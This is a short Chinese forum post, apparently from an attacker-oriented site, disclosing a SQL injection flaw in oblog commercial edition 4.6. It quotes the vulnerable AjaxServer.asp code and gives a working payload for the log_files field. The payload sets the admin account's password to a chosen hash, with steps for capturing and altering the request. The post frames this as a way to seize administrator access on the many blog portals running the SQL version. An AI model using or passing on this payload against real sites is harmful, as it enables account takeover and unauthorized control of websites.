oblog商业版本4.6注射漏洞,直接拿管理员
漏洞描述:<BR> 通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。<BR>漏洞文件:AjaxServer.asp<BR>变量:log_files<BR>语句:log_files=Replace(log_files," ","")<BR>If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)<BR>rs("logpics") = log_files<BR>'附加文件处理<BR>If log_files <>"" Then<BR> oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"<BR>End if<BR>'Tag处理<BR>利用:<BR> 首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包, 修改log_files。2);update/**/oblog_user/**/set/**/password=7a57a5a743894a0e/**/where/**/username=admin;--<BR><BR><IMG alt="" src="http://www.52cmd.cn/blog/attachments/month_0708/h200788143219.jpg" border=0><BR><BR><BR> 关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 <BR> 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧. <BR>re:oblog商业版本4.6注射漏洞,直接拿管理员
顶!
页:
[1]